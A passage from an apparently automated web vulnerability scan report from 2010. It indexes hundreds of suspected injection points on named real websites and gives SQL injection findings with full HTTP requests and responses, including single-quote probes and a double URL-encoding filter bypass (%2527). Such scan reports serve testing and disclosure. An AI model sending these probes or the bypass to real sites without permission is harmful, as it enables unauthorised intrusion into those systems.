4.33. http://gmtrx.com/tracking202/static/landing.php [lpip parameter]

4.34. http://gmtrx.com/tracking202/static/landing.php [name of an arbitrarily supplied request parameter]

4.35. http://http300.edge.ru4.com/smartserve/ad [VS_cookie parameter]

4.36. http://http300.edge.ru4.com/smartserve/ad [VS_cookie parameter]

4.37. http://http300.edge.ru4.com/smartserve/ad [cg5 parameter]

4.38. http://http300.edge.ru4.com/smartserve/ad [cg5 parameter]

4.39. http://http300.edge.ru4.com/smartserve/ad [customer_indicator parameter]

4.40. http://http300.edge.ru4.com/smartserve/ad [customer_indicator parameter]

4.41. http://http300.edge.ru4.com/smartserve/ad [paidornatural parameter]

4.42. http://http300.edge.ru4.com/smartserve/ad [referrer parameter]

4.43. http://http300.edge.ru4.com/smartserve/ad [referrer parameter]

4.44. http://http300.edge.ru4.com/smartserve/ad [searchterm parameter]

4.45. http://its.ucsc.edu/terms/google_analytics.php [name of an arbitrarily supplied request parameter]

4.46. http://its.ucsc.edu/terms/google_analytics.php [name of an arbitrarily supplied request parameter]

4.47. http://js.revsci.net/gateway/gw.js [csid parameter]

4.48. http://m.mercurynews.com/sjm/db_101028/contentdetail.htm [name of an arbitrarily supplied request parameter]

4.49. http://m.mercurynews.com/sjm/db_101028_index.htm [name of an arbitrarily supplied request parameter]

4.50. http://m.mercurynews.com/sjm/db_101030/contentdetail.htm [name of an arbitrarily supplied request parameter]

4.51. http://m.mercurynews.com/sjm/db_101032_index.htm [name of an arbitrarily supplied request parameter]

4.52. http://m.mercurynews.com/sjm/db_101036/contentdetail.htm [name of an arbitrarily supplied request parameter]

4.53. http://m.mercurynews.com/sjm/db_101036_index.htm [name of an arbitrarily supplied request parameter]

4.54. http://m.mercurynews.com/sjm/db_101038/contentdetail.htm [name of an arbitrarily supplied request parameter]

4.55. http://m.mercurynews.com/sjm/db_101041/contentdetail.htm [name of an arbitrarily supplied request parameter]

4.56. http://m.mercurynews.com/sjm/db_101041_index.htm [name of an arbitrarily supplied request parameter]

4.57. http://m.mercurynews.com/sjm/db_101043/contentdetail.htm [name of an arbitrarily supplied request parameter]

4.58. http://m.mercurynews.com/sjm/db_101043_index.htm [name of an arbitrarily supplied request parameter]

4.59. http://m.mercurynews.com/sjm/db_101049/contentdetail.htm [name of an arbitrarily supplied request parameter]

4.60. http://m.mercurynews.com/sjm/db_101049_index.htm [name of an arbitrarily supplied request parameter]

4.61. http://m.mercurynews.com/sjm/db_101051/contentdetail.htm [name of an arbitrarily supplied request parameter]

4.62. http://m.mercurynews.com/sjm/db_101051_index.htm [name of an arbitrarily supplied request parameter]

4.63. http://m.mercurynews.com/sjm/db_12120_index.htm [name of an arbitrarily supplied request parameter]

4.64. http://m.mercurynews.com/sjm/index.htm [name of an arbitrarily supplied request parameter]

4.65. http://netweather.accuweather.com/adcbin/netweather_v2/netweatherV2ex.asp [lang parameter]

4.66. http://netweather.accuweather.com/adcbin/netweather_v2/netweatherV2ex.asp [logo parameter]

4.67. http://netweather.accuweather.com/adcbin/netweather_v2/netweatherV2ex.asp [metric parameter]

4.68. http://netweather.accuweather.com/adcbin/netweather_v2/netweatherV2ex.asp [partner parameter]

4.69. http://netweather.accuweather.com/adcbin/netweather_v2/netweatherV2ex.asp [tStyle parameter]

4.70. http://netweather.accuweather.com/adcbin/netweather_v2/netweatherV2ex.asp [target parameter]

4.71. http://netweather.accuweather.com/adcbin/netweather_v2/netweatherV2ex.asp [theme parameter]

4.72. http://netweather.accuweather.com/adcbin/netweather_v2/netweatherV2ex.asp [zipcode parameter]

4.73. http://news1reports.com/default-js.asp [funnelid parameter]

4.74. http://news1reports.com/default-js.asp [funnelid parameter]

4.75. http://newspaperads.mercurynews.com/FSI/AllPages.aspx [version parameter]

4.76. http://newspaperads.mercurynews.com/FSI/Brands.aspx [version parameter]

4.77. http://newspaperads.mercurynews.com/FSI/Page.aspx [version parameter]

4.78. http://newspaperads.mercurynews.com/shared/EmailAFriend.aspx [refer parameter]

4.79. https://rtn.fididel.com/script.js [button parameter]

4.80. http://sanfrancisco.giants.mlb.com/index.jsp [c_id parameter]

4.81. http://sanfrancisco.giants.mlb.com/index.jsp [name of an arbitrarily supplied request parameter]

4.82. http://search.haas.berkeley.edu/search [q parameter]

4.83. https://secure.www.mercurynews.com/portlet/registration/html/info.jsp [rFreeForm parameter]

4.84. https://secure.www.mercurynews.com/registration [rPage parameter]

4.85. http://tap.rubiconproject.com/partner/agent/rubicon/channels.js [cb parameter]

4.86. http://tipd.com/ [name of an arbitrarily supplied request parameter]

4.87. http://redcated/INV/iview/255848431/direct/01 [name of an arbitrarily supplied request parameter]

4.88. http://redcated/NYC/iview/262034928/direct/01 [REST URL parameter 4]

4.89. http://redcated/NYC/iview/262034928/direct/01 [click parameter]

4.90. http://redcated/NYC/iview/262034928/direct/01 [click parameter]

4.91. http://redcated/NYC/iview/262034928/direct/01 [click parameter]

4.92. http://redcated/NYC/iview/262034928/direct/01 [name of an arbitrarily supplied request parameter]

4.93. http://redcated/NYC/iview/262034928/direct/01 [name of an arbitrarily supplied request parameter]

4.94. http://redcated/NYC/iview/262034928/direct/01 [name of an arbitrarily supplied request parameter]

4.95. http://redcated/NYC/iview/262034929/direct/01 [REST URL parameter 4]

4.96. http://redcated/NYC/iview/262034929/direct/01 [click parameter]

4.97. http://redcated/NYC/iview/262034929/direct/01 [click parameter]

4.98. http://redcated/NYC/iview/262034929/direct/01 [click parameter]

4.99. http://redcated/NYC/iview/262034929/direct/01 [name of an arbitrarily supplied request parameter]

4.100. http://redcated/NYC/iview/262034929/direct/01 [name of an arbitrarily supplied request parameter]

4.101. http://redcated/NYC/iview/262034929/direct/01 [name of an arbitrarily supplied request parameter]

4.102. http://weekly-consumer-tips.com/ [&t202id parameter]

4.103. http://weekly-consumer-tips.com/ [c3 parameter]

4.104. http://weekly-consumer-tips.com/ [t202kw parameter]

4.105. http://www.addthis.com/bookmark.php [REST URL parameter 1]

4.106. http://www.addthis.com/bookmark.php [REST URL parameter 1]

4.107. http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter]

4.108. http://www.azcentral.com/members/Blog/JimGintonio [REST URL parameter 2]

4.109. http://www.capitalone.com/directbanking/interest-online-checking-account/index.php [linkid parameter]

4.110. http://www.capitalone.com/directbanking/interest-online-checking-account/index.php [name of an arbitrarily supplied request parameter]

4.111. http://www.capitalone.com/directbanking/interest-online-checking-account/index.php [name of an arbitrarily supplied request parameter]

4.112. http://www.capitalone.com/directbanking/rewards-online-checking-account/index.php [linkid parameter]

4.113. http://www.capitalone.com/directbanking/rewards-online-checking-account/index.php [name of an arbitrarily supplied request parameter]

4.114. http://www.capitalone.com/directbanking/rewards-online-checking-account/index.php [name of an arbitrarily supplied request parameter]

4.115. http://www.care2.com/news/ [name of an arbitrarily supplied request parameter]

4.116. http://www.carpricesecrets.com/mercury [REST URL parameter 1]

4.117. http://www.carpricesecrets.com/mercury [t_se parameter]

4.118. http://www.carpricesecrets.com/page_footer_frame.php [REST URL parameter 1]

4.119. http://www.carpricesecrets.com/page_footer_frame.php [body parameter]

4.120. http://www.carpricesecrets.com/page_footer_frame.php [make parameter]

4.121. http://www.carpricesecrets.com/page_footer_frame.php [model parameter]

4.122. http://www.carpricesecrets.com/page_footer_frame.php [zip parameter]

4.123. http://www.carpricesecrets.com/page_footer_frame.php [zip parameter]

4.124. http://www.chefuniforms.com/ [name of an arbitrarily supplied request parameter]

4.125. http://www.contracostatimes.com/mngi/tracking/track [c parameter]

4.126. http://www.contracostatimes.com/mngi/tracking/track [n parameter]

4.127. http://www.contracostatimes.com/mngi/tracking/track [s parameter]

4.128. http://www.contracostatimes.com/mngi/tracking/track [t parameter]

4.129. http://www.contracostatimes.com/portlet/article/html/render_gallery.jsp [startImage parameter]

4.130. http://www.csnbayarea.com/11/27/10/Urban-Sorting-Out-the-Giants-Shortstop-S/landing_urban_v3.html [REST URL parameter 1]

4.131. http://www.csnbayarea.com/11/27/10/Urban-Sorting-Out-the-Giants-Shortstop-S/landing_urban_v3.html [REST URL parameter 2]

4.132. http://www.csnbayarea.com/11/27/10/Urban-Sorting-Out-the-Giants-Shortstop-S/landing_urban_v3.html [REST URL parameter 3]

4.133. http://www.csnbayarea.com/11/27/10/Urban-Sorting-Out-the-Giants-Shortstop-S/landing_urban_v3.html [REST URL parameter 4]

4.134. http://www.csnbayarea.com/11/27/10/Urban-Sorting-Out-the-Giants-Shortstop-S/landing_urban_v3.html [feedID parameter]

4.135. http://www.csnbayarea.com/11/27/10/Urban-Sorting-Out-the-Giants-Shortstop-S/landing_urban_v3.html [name of an arbitrarily supplied request parameter]

4.136. http://www.fremonttoyota.com/Toyota-Dealer/Cupertino/About%20Us/ [REST URL parameter 2]

4.137. http://www.fremonttoyota.com/Toyota-Dealer/Cupertino/About%20Us/ [REST URL parameter 2]

4.138. http://www.fremonttoyota.com/Toyota-Dealer/Cupertino/About%20Us/ [REST URL parameter 2]

4.139. http://www.fremonttoyota.com/Toyota-Dealer/Cupertino/About%20Us/ [REST URL parameter 3]

4.140. http://www.fremonttoyota.com/Toyota-Dealer/Fremont/About%20Us/ [REST URL parameter 3]

4.141. http://www.fremonttoyota.com/Toyota-Dealer/Milpitas/About%20Us/ [REST URL parameter 3]

4.142. http://www.fremonttoyota.com/Toyota-Dealer/San%20Leandro/About%20Us/ [REST URL parameter 2]

4.143. http://www.fremonttoyota.com/Toyota-Dealer/San%20Leandro/About%20Us/ [REST URL parameter 2]

4.144. http://www.fremonttoyota.com/Toyota-Dealer/San%20Leandro/About%20Us/ [REST URL parameter 2]

4.145. http://www.fremonttoyota.com/Toyota-Dealer/San%20Leandro/About%20Us/ [REST URL parameter 3]

4.146. http://www.fremonttoyota.com/Toyota-Dealer/San%20Mateo/About%20Us/ [REST URL parameter 2]

4.147. http://www.fremonttoyota.com/Toyota-Dealer/San%20Mateo/About%20Us/ [REST URL parameter 2]

4.148. http://www.fremonttoyota.com/Toyota-Dealer/San%20Mateo/About%20Us/ [REST URL parameter 2]

4.149. http://www.fremonttoyota.com/Toyota-Dealer/San%20Mateo/About%20Us/ [REST URL parameter 3]

4.150. http://www.fremonttoyota.com/Toyota/4Runner/ [REST URL parameter 2]

4.151. http://www.fremonttoyota.com/Toyota/4Runner/ [REST URL parameter 2]

4.152. http://www.fremonttoyota.com/Toyota/4Runner/ [REST URL parameter 2]

4.153. http://www.fremonttoyota.com/Toyota/Avalon/ [REST URL parameter 2]

4.154. http://www.fremonttoyota.com/Toyota/Avalon/ [REST URL parameter 2]

4.155. http://www.fremonttoyota.com/Toyota/Avalon/ [REST URL parameter 2]

4.156. http://www.fremonttoyota.com/Toyota/Camry%20Hybrid/ [REST URL parameter 2]

4.157. http://www.fremonttoyota.com/Toyota/Camry%20Hybrid/ [REST URL parameter 2]

4.158. http://www.fremonttoyota.com/Toyota/Camry%20Hybrid/ [REST URL parameter 2]

4.159. http://www.fremonttoyota.com/Toyota/Camry/ [REST URL parameter 2]

4.160. http://www.fremonttoyota.com/Toyota/Camry/ [REST URL parameter 2]

4.161. http://www.fremonttoyota.com/Toyota/Camry/ [REST URL parameter 2]

4.162. http://www.fremonttoyota.com/Toyota/Corolla/ [REST URL parameter 2]

4.163. http://www.fremonttoyota.com/Toyota/Corolla/ [REST URL parameter 2]

4.164. http://www.fremonttoyota.com/Toyota/Corolla/ [REST URL parameter 2]

4.165. http://www.fremonttoyota.com/Toyota/FJ%20Cruiser%204x2/ [REST URL parameter 2]

4.166. http://www.fremonttoyota.com/Toyota/FJ%20Cruiser%204x2/ [REST URL parameter 2]

4.167. http://www.fremonttoyota.com/Toyota/FJ%20Cruiser%204x2/ [REST URL parameter 2]

4.168. http://www.fremonttoyota.com/Toyota/FJ%20Cruiser%204x4/ [REST URL parameter 2]

4.169. http://www.fremonttoyota.com/Toyota/FJ%20Cruiser%204x4/ [REST URL parameter 2]

4.170. http://www.fremonttoyota.com/Toyota/FJ%20Cruiser%204x4/ [REST URL parameter 2]

4.171. http://www.fremonttoyota.com/Toyota/Highlander%20Hybrid/ [REST URL parameter 2]

4.172. http://www.fremonttoyota.com/Toyota/Highlander%20Hybrid/ [REST URL parameter 2]

4.173. http://www.fremonttoyota.com/Toyota/Highlander%20Hybrid/ [REST URL parameter 2]

4.174. http://www.fremonttoyota.com/Toyota/Highlander/ [REST URL parameter 2]

4.175. http://www.fremonttoyota.com/Toyota/Highlander/ [REST URL parameter 2]

4.176. http://www.fremonttoyota.com/Toyota/Highlander/ [REST URL parameter 2]

4.177. http://www.fremonttoyota.com/Toyota/Land%20Cruiser/ [REST URL parameter 2]

4.178. http://www.fremonttoyota.com/Toyota/Land%20Cruiser/ [REST URL parameter 2]

4.179. http://www.fremonttoyota.com/Toyota/Land%20Cruiser/ [REST URL parameter 2]

4.180. http://www.fremonttoyota.com/Toyota/Matrix/ [REST URL parameter 2]

4.181. http://www.fremonttoyota.com/Toyota/Matrix/ [REST URL parameter 2]

4.182. http://www.fremonttoyota.com/Toyota/Matrix/ [REST URL parameter 2]

4.183. http://www.fremonttoyota.com/Toyota/Prius/ [REST URL parameter 2]

4.184. http://www.fremonttoyota.com/Toyota/Prius/ [REST URL parameter 2]

4.185. http://www.fremonttoyota.com/Toyota/Prius/ [REST URL parameter 2]

4.186. http://www.fremonttoyota.com/Toyota/RAV4/ [REST URL parameter 2]

4.187. http://www.fremonttoyota.com/Toyota/RAV4/ [REST URL parameter 2]

4.188. http://www.fremonttoyota.com/Toyota/RAV4/ [REST URL parameter 2]

4.189. http://www.fremonttoyota.com/Toyota/Sequoia/ [REST URL parameter 2]

4.190. http://www.fremonttoyota.com/Toyota/Sequoia/ [REST URL parameter 2]

4.191. http://www.fremonttoyota.com/Toyota/Sequoia/ [REST URL parameter 2]

4.192. http://www.fremonttoyota.com/Toyota/Sienna/ [REST URL parameter 2]

4.193. http://www.fremonttoyota.com/Toyota/Sienna/ [REST URL parameter 2]

4.194. http://www.fremonttoyota.com/Toyota/Sienna/ [REST URL parameter 2]

4.195. http://www.fremonttoyota.com/Toyota/Tacoma%204x2/ [REST URL parameter 2]

4.196. http://www.fremonttoyota.com/Toyota/Tacoma%204x2/ [REST URL parameter 2]

4.197. http://www.fremonttoyota.com/Toyota/Tacoma%204x2/ [REST URL parameter 2]

4.198. http://www.fremonttoyota.com/Toyota/Tacoma%204x4/ [REST URL parameter 2]

4.199. http://www.fremonttoyota.com/Toyota/Tacoma%204x4/ [REST URL parameter 2]

4.200. http://www.fremonttoyota.com/Toyota/Tacoma%204x4/ [REST URL parameter 2]

4.201. http://www.fremonttoyota.com/Toyota/Tacoma%20PreRunner/ [REST URL parameter 2]

4.202. http://www.fremonttoyota.com/Toyota/Tacoma%20PreRunner/ [REST URL parameter 2]

4.203. http://www.fremonttoyota.com/Toyota/Tacoma%20PreRunner/ [REST URL parameter 2]

4.204. http://www.fremonttoyota.com/Toyota/Tundra%20Crew%20Max%204x2/ [REST URL parameter 2]

4.205. http://www.fremonttoyota.com/Toyota/Tundra%20Crew%20Max%204x2/ [REST URL parameter 2]

4.206. http://www.fremonttoyota.com/Toyota/Tundra%20Crew%20Max%204x2/ [REST URL parameter 2]

4.207. http://www.fremonttoyota.com/Toyota/Tundra%20Crew%20Max%204x4/ [REST URL parameter 2]

4.208. http://www.fremonttoyota.com/Toyota/Tundra%20Crew%20Max%204x4/ [REST URL parameter 2]

4.209. http://www.fremonttoyota.com/Toyota/Tundra%20Crew%20Max%204x4/ [REST URL parameter 2]

4.210. http://www.fremonttoyota.com/Toyota/Tundra%20Double%20Cab%204x2/ [REST URL parameter 2]

4.211. http://www.fremonttoyota.com/Toyota/Tundra%20Double%20Cab%204x2/ [REST URL parameter 2]

4.212. http://www.fremonttoyota.com/Toyota/Tundra%20Double%20Cab%204x2/ [REST URL parameter 2]

4.213. http://www.fremonttoyota.com/Toyota/Tundra%20Double%20Cab%204x4/ [REST URL parameter 2]

4.214. http://www.fremonttoyota.com/Toyota/Tundra%20Double%20Cab%204x4/ [REST URL parameter 2]

4.215. http://www.fremonttoyota.com/Toyota/Tundra%20Double%20Cab%204x4/ [REST URL parameter 2]

4.216. http://www.fremonttoyota.com/Toyota/Tundra%20Regular%20Cab%204x2/ [REST URL parameter 2]

4.217. http://www.fremonttoyota.com/Toyota/Tundra%20Regular%20Cab%204x2/ [REST URL parameter 2]

4.218. http://www.fremonttoyota.com/Toyota/Tundra%20Regular%20Cab%204x2/ [REST URL parameter 2]

4.219. http://www.fremonttoyota.com/Toyota/Tundra%20Regular%20Cab%204x4/ [REST URL parameter 2]

4.220. http://www.fremonttoyota.com/Toyota/Tundra%20Regular%20Cab%204x4/ [REST URL parameter 2]

4.221. http://www.fremonttoyota.com/Toyota/Tundra%20Regular%20Cab%204x4/ [REST URL parameter 2]

4.222. http://www.fremonttoyota.com/Toyota/Venza/ [REST URL parameter 2]

4.223. http://www.fremonttoyota.com/Toyota/Venza/ [REST URL parameter 2]

4.224. http://www.fremonttoyota.com/Toyota/Venza/ [REST URL parameter 2]

4.225. http://www.fremonttoyota.com/Toyota/Yaris/ [REST URL parameter 2]

4.226. http://www.fremonttoyota.com/Toyota/Yaris/ [REST URL parameter 2]

4.227. http://www.fremonttoyota.com/Toyota/Yaris/ [REST URL parameter 2]

4.228. http://www.fremonttoyota.com/carresearch/BodystylesGroup/confid_fremonttoyota/make_Toyota/ [REST URL parameter 3]

4.229. http://www.fremonttoyota.com/carresearch/BodystylesGroup/confid_fremonttoyota/make_Toyota/ [REST URL parameter 4]

4.230. http://www.fremonttoyota.com/carresearch/BodystylesGroup/confid_fremonttoyota/make_Toyota/ [REST URL parameter 4]

4.231. http://www.fremonttoyota.com/carresearch/BodystylesGroup/confid_fremonttoyota/make_Toyota/ [REST URL parameter 4]

4.232. http://www.fremonttoyota.com/carresearch/BodystylesGroup/confid_fremonttoyota/make_Toyota/ [REST URL parameter 4]

4.233. http://www.fremonttoyota.com/carresearch/BodystylesGroup/confid_fremonttoyota/make_Toyota/ [REST URL parameter 4]

4.234. http://www.fremonttoyota.com/inventory.php [&VehicleType parameter]

4.235. http://www.fremonttoyota.com/inventory.php [&VehicleType parameter]

4.236. http://www.fremonttoyota.com/inventory.php [&VehicleType parameter]

4.237. http://www.fremonttoyota.com/inventory.php [Model parameter]

4.238. http://www.fremonttoyota.com/inventory.php [Model parameter]

4.239. http://www.fremonttoyota.com/inventory.php [Model parameter]

4.240. http://www.fremonttoyota.com/inventory.php [VehicleType parameter]

4.241. http://www.fremonttoyota.com/inventory.php [VehicleType parameter]

4.242. http://www.fremonttoyota.com/inventory.php [VehicleType parameter]

4.243. http://www.fremonttoyota.com/inventory.php [name of an arbitrarily supplied request parameter]

4.244. http://www.fremonttoyota.com/inventory.php [name of an arbitrarily supplied request parameter]

4.245. http://www.fremonttoyota.com/inventory.php [name of an arbitrarily supplied request parameter]

4.246. http://www.fremonttoyota.com/quick-quote.html [model parameter]

4.247. http://www.fremonttoyota.com/search/CPO+t [REST URL parameter 2]

4.248. http://www.fremonttoyota.com/search/New+2011+Toyota+Avalon+tymM [REST URL parameter 2]

4.249. http://www.fremonttoyota.com/search/New+2011+Toyota+Sienna+tymM [REST URL parameter 2]

4.250. http://www.fremonttoyota.com/search/New+Toyota+tm [REST URL parameter 2]

4.251. http://www.fremonttoyota.com/search/Used+Toyota+tm [REST URL parameter 2]

4.252. http://www.fremonttoyota.com/search/Used+t [REST URL parameter 2]

4.253. http://www.gotdailydeals.com/contact [REST URL parameter 1]

4.254. http://www.gotdailydeals.com/eb [REST URL parameter 1]

4.255. http://www.gotdailydeals.com/facebook-login [REST URL parameter 1]

4.256. http://www.gotdailydeals.com/forgot-password [REST URL parameter 1]

4.257. http://www.gotdailydeals.com/j_spring_security_check [REST URL parameter 1]

4.258. http://www.gotdailydeals.com/privacy [REST URL parameter 1]

4.259. http://www.gotdailydeals.com/r [REST URL parameter 1]

4.260. http://www.gotdailydeals.com/sb [REST URL parameter 1]

4.261. http://www.gotdailydeals.com/sb/ [REST URL parameter 1]

4.262. http://www.gotdailydeals.com/subscribe [REST URL parameter 1]

4.263. http://www.gotdailydeals.com/tou [REST URL parameter 1]

4.264. http://www.gotdailydeals.com/widgets/sbpromo [REST URL parameter 2]

4.265. http://www.kledy.de/ [name of an arbitrarily supplied request parameter]

4.266. http://www.linkedin.com/company/api/recommendation/count [callback parameter]

4.267. https://www.linkedin.com/uas/connect/logout [REST URL parameter 1]

4.268. https://www.linkedin.com/uas/connect/user-signin [REST URL parameter 1]

4.269. https://www.linkedin.com/uas/js/authuserspace [REST URL parameter 1]

4.270. https://www.linkedin.com/uas/js/userspace [REST URL parameter 1]

4.271. https://www.linkedin.com/uas/oauth2/authorize [REST URL parameter 1]

4.272. http://www.mathias-bank.de/ [name of an arbitrarily supplied request parameter]

4.273. http://www.netvouz.com/ [name of an arbitrarily supplied request parameter]

4.274. http://www.nj.com/devils/index.ssf/devilsbeatreportersblog/ [name of an arbitrarily supplied request parameter]

4.275. http://www.protopage.com/ [name of an arbitrarily supplied request parameter]

4.276. http://www.shoplocal.com/bayareacom/coupons.aspx [name of an arbitrarily supplied request parameter]

4.277. http://www.shoplocal.com/bayareacom/home.aspx [name of an arbitrarily supplied request parameter]

4.278. http://www.shoplocal.com/bayareacom/topdeals.aspx [name of an arbitrarily supplied request parameter]

4.279. http://www.shoplocal.com/bayareacom/topdealslanding.aspx [name of an arbitrarily supplied request parameter]

4.280. http://www.shoplocal.com/bayareacom/weeklyads.aspx [name of an arbitrarily supplied request parameter]

4.281. http://www.shoplocal.com/san+jose/home.aspx [name of an arbitrarily supplied request parameter]

4.282. http://www.shoplocal.com/searchlocal.aspx [name of an arbitrarily supplied request parameter]

4.283. http://www.shoplocal.com/searchlocal.aspx [searchtext parameter]

4.284. http://www.shoplocal.com/searchlocal.aspx [searchtext parameter]

4.285. https://www.starbucks.com/card [name of an arbitrarily supplied request parameter]

4.286. https://www.starbucks.com/card/rewards/card-rewards-canada [name of an arbitrarily supplied request parameter]

4.287. https://www.starbucks.com/card/rewards/program-information [name of an arbitrarily supplied request parameter]

4.288. https://www.starbucks.com/card/starbucks-gold [name of an arbitrarily supplied request parameter]

4.289. http://www.stltoday.com/blogzone/morning-skate/ [name of an arbitrarily supplied request parameter]

4.290. http://www.ucsc-extension.edu/programs/bioinformatics [name of an arbitrarily supplied request parameter]

4.291. http://www.ucsc-extension.edu/programs/biotechnology [name of an arbitrarily supplied request parameter]

4.292. http://www.ucsc-extension.edu/programs/medical-devices [name of an arbitrarily supplied request parameter]

4.293. http://medienfreunde.com/lab/innerfade/ [Referer HTTP header]

4.294. https://secure.www.mercurynews.com/registration [Referer HTTP header]

4.295. https://secure.www.mercurynews.com/registration [Referer HTTP header]

4.296. http://solutions.liveperson.com/ref/lppb.asp [Referer HTTP header]

4.297. http://www.accuweather.com/index-radar.asp [Referer HTTP header]

4.298. http://www.accuweather.com/maps-satellite.asp [Referer HTTP header]

4.299. http://www.addthis.com/bookmark.php [Referer HTTP header]

4.300. http://www.addthis.com/bookmark.php [Referer HTTP header]

4.301. http://www.arto.com/ [User-Agent HTTP header]

4.302. http://www.protopage.com/ [Referer HTTP header]

4.303. http://ads.yldmgrimg.net/apex/template/swfobject.js [REST URL parameter 1]

4.304. http://ads.yldmgrimg.net/apex/template/swfobject.js [REST URL parameter 2]

4.305. http://ads.yldmgrimg.net/apex/template/swfobject.js [REST URL parameter 3]

4.306. http://optimized-by.rubiconproject.com/a/5833/7750/12853-2.js [ruid cookie]

4.307. http://optimized-by.rubiconproject.com/a/5833/7750/12853-9.js [ruid cookie]

4.308. http://optimized-by.rubiconproject.com/a/dk.js [ruid cookie]

4.309. http://seg.sharethis.com/getSegment.php [__stid cookie]

4.310. http://www.sunnyvalevw.com/ [sId cookie]

4.311. http://www.sunnyvalevw.com/ [visitorId cookie]

4.312. http://www.sunnyvalevw.com/ContactUsForm [sId cookie]

4.313. http://www.sunnyvalevw.com/ContactUsForm [visitorId cookie]

4.314. http://www.sunnyvalevw.com/HomePage [sId cookie]

4.315. http://www.sunnyvalevw.com/HomePage [visitorId cookie]

4.316. http://www.sunnyvalevw.com/HoursAndDirections [sId cookie]

4.317. http://www.sunnyvalevw.com/HoursAndDirections [visitorId cookie]

4.318. http://www.sunnyvalevw.com/PrivacyPolicy [sId cookie]

4.319. http://www.sunnyvalevw.com/PrivacyPolicy [visitorId cookie]

4.320. http://www.sunnyvalevw.com/ServiceEvent_D [sId cookie]

4.321. http://www.sunnyvalevw.com/ServiceEvent_D [visitorId cookie]

4.322. http://www.sunnyvalevw.com/siteMap [sId cookie]

4.323. http://www.sunnyvalevw.com/siteMap [visitorId cookie]



1. SQL injection  next
There are 290 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://4c28d6.r.axf8.net/mr/a.gif [a parameter]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://4c28d6.r.axf8.net
Path:   /mr/a.gif

Issue detail

The a parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the a parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /mr/a.gif?a=4C28D6'&v=1 HTTP/1.1
Host: 4c28d6.r.axf8.net
Proxy-Connection: keep-alive
Referer: http://www.mercurynews.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Length: 3028
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 22:57:48 GMT

<html>
<head>
<title>Runtime Error</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";fon
...[SNIP]...

Request 2

GET /mr/a.gif?a=4C28D6''&v=1 HTTP/1.1
Host: 4c28d6.r.axf8.net
Proxy-Connection: keep-alive
Referer: http://www.mercurynews.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 0
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 22:57:49 GMT


1.2. http://blogs.mercurynews.com/aei/2010/12/07/charlie-brown-vs-the-grinch-round-3-of-our-holiday-tv-tourney-has-started-vote-now/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://blogs.mercurynews.com
Path:   /aei/2010/12/07/charlie-brown-vs-the-grinch-round-3-of-our-holiday-tv-tourney-has-started-vote-now/

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /aei/2010/12%2527/07/charlie-brown-vs-the-grinch-round-3-of-our-holiday-tv-tourney-has-started-vote-now/ HTTP/1.1
Host: blogs.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
Date: Tue, 07 Dec 2010 23:12:24 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Tue, 07 Dec 2010 23:12:24 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Length: 358
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta http-equiv="Content-
...[SNIP]...

Request 2

